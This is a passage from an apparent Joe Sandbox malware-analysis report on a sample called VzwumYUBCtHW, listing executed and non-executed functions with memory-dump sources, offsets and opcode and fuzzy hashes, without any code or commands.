                      Function 00F8D49F Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1944828862.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_f8d000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                      • Instruction ID: 9dc8c17ba13d2f86bc69f69634fc1ab9adc53e92e21d0d6bb390c1ff98568c2a
                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                      • Instruction Fuzzy Hash: A011BE75904244CFCB02DF14C5C4B55BFB1FB84328F28C6AAD8494F296C33AD80ADB51
                      Function 00F7DAE5 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1944771581.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_f7d000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 62b8cbd1a2065761d281463ca0b9a8d20e791d7f780a20ddbd933bf42d08cc3a
                      • Instruction ID: 3869707ca792810ec45417307754cd37a032901d8e892080231fc90da812a17a
                      • Opcode Fuzzy Hash: 62b8cbd1a2065761d281463ca0b9a8d20e791d7f780a20ddbd933bf42d08cc3a
                      • Instruction Fuzzy Hash: 6C0184325083449AE7109A19C9C4767FFE8DF95324F58C42BED0D4A286C7799840E672
                      Function 00F7DAE4 Relevance: .0, Instructions: 36COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1944771581.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_f7d000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6ef63aa788e6689b542b76348b680b4aa0df5e7bc2db95634781085bedb9d3b1
                      • Instruction ID: 559086b64b759d9ed679f0401e3afa379dfba88e346ea6b34b7d2e1dbd7e9fe3
                      • Opcode Fuzzy Hash: 6ef63aa788e6689b542b76348b680b4aa0df5e7bc2db95634781085bedb9d3b1
                      • Instruction Fuzzy Hash: BFF06D72408344AAE7108E1AC9C4B66FFE8EF95735F18C45AED0C4B286C3799844DAB1

                      Non-executed Functions

                      Function 066F0D50 Relevance: 10.3, Strings: 8, Instructions: 298COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.1962866463.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_66f0000_VzwumYUBCtHW.jbxd
                      Similarity
                      • API ID:
                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                      • API String ID: 0-3823777903
                      • Opcode ID: 11e14776dbb47fbc1400400513c7a964f16e2618aeee373a35529123d7f0e539
                      • Instruction ID: 58496b51d21e9301e154479cadda7cd3f4550b814fbbd5ded52ee236d3233df4
                      • Opcode Fuzzy Hash: 11e14776dbb47fbc1400400513c7a964f16e2618aeee373a35529123d7f0e539
                      • Instruction Fuzzy Hash: 16B1C230B10289CFCB55DB69C86497EBBF6BF85200B14845AE506CB3A6CF35DC52CB90